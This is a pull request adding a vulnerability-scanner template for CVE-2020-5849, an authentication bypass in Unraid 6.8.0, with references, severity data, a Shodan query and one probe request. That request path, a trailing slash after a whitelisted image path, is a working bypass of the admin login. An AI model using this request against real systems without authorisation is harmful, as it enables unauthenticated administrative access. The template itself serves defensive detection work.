### PR TITLE
Add CVE-2020-5849 template for Unraid Authentication Bypass

### DIFF
--- a/http/cves/2020/CVE-2020-5849.yaml
+++ b/http/cves/2020/CVE-2020-5849.yaml
@@ -1,0 +1,60 @@
+id: CVE-2020-5849
+
+info:
+  name: Unraid 6.8.0 - Authentication Bypass
+  author: singhvishalkr
+  severity: high
+  description: |
+    Unraid 6.8.0 contains an authentication bypass vulnerability. The auth_request.php script uses strpos() incorrectly to validate whitelisted URIs, allowing attackers to bypass authentication by appending a trailing slash to whitelisted image paths.
+  impact: |
+    An attacker can gain access to protected administrative pages without authentication, potentially leading to full system compromise when chained with CVE-2020-5847.
+  remediation: |
+    Upgrade to Unraid version 6.8.1 or later where this vulnerability has been patched.
+  reference:
+    - https://sysdream.com/cve-2020-5847-cve-2020-5849-unraid/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-5849
+    - https://www.exploit-db.com/exploits/48353
+    - https://forums.unraid.net/forum/7-announcements/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2020-5849
+    cwe-id: CWE-697
+    epss-score: 0.9723
+    epss-percentile: 0.99887
+    cpe: cpe:2.3:a:lime-technology:unraid:6.8.0:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: lime-technology
+    product: unraid
+    shodan-query: title:"Unraid"
+  tags: cve,cve2020,unraid,auth-bypass,kev
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/webGui/images/green-on.png/Settings"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Unraid"
+          - "Settings"
+        condition: and
+
+      - type: word
+        part: body
+        words:
+          - "Date and Time"
+          - "Disk Settings"
+          - "Network Settings"
+          - "Identification"
+          - "Management Access"
+        condition: or
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
## Summary
- Adds detection template for CVE-2020-5849 (Unraid 6.8.0 authentication bypass)
- The auth_request.php script uses strpos() incorrectly allowing bypass via trailing slash on whitelisted paths
- CVSS 7.5 High - Unauthenticated access to admin pages

## Test Plan
- Template verified against documented exploit behavior
- Targets /webGui/images/green-on.png/Settings endpoint
- Multiple matchers for Unraid-specific content

## References
- https://sysdream.com/cve-2020-5847-cve-2020-5849-unraid/
- https://nvd.nist.gov/vuln/detail/CVE-2020-5849

/claim #7549